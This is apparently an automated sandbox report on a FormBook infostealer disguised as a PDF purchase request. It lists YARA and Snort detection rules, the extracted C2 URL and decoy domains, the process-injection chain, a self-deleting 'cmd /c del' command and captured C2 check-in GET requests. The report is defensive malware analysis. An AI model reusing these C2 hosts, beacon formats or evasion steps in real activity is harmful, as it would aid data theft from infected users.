
Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name: RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID: 383968
MD5: 98f9ea244308bb5969ea3c302c32efcd
SHA1: 82a913894418af7834d23bc543eb286230d4edf4
SHA256: cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
    • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6316 cmdline: /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}

Yara Overview

Memory Dumps

Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

          Found malware configuration
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll | ReversingLabs: Detection: 22%
          Multi AV Scanner detection for submitted file
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Virustotal: Detection: 35%
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | ReversingLabs: Detection: 41%
          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Joe Sandbox ML: detected
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.4ca7960.4.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.a0a460.0.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004026BC FindFirstFileA

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.luegomusic.com/pe0r/
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.1364kensington.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.luegomusic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.kf350.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.pierresplayhouse.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.thecapitalhut.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.ssfgasia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.desertfoxindustries.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.tennesseewheelrepair.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1 Host: www.rootedwithlovejax.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View | IP Address: 199.59.242.153
          Source: Joe Sandbox View | ASN Name: BODIS-NJUS
          Source: Joe Sandbox View | ASN Name: BIZLAND-SDUS
          Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS
          Source: unknown | DNS traffic detected: queries for: www.1364kensington.com
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 11:22:07 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: http://business.google.com/
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://ads.google.com/localservices
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://business.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://rootedwithlovejax.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://schema.org/LocalBusiness
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://workspace.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/maps/dir//Rooted
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
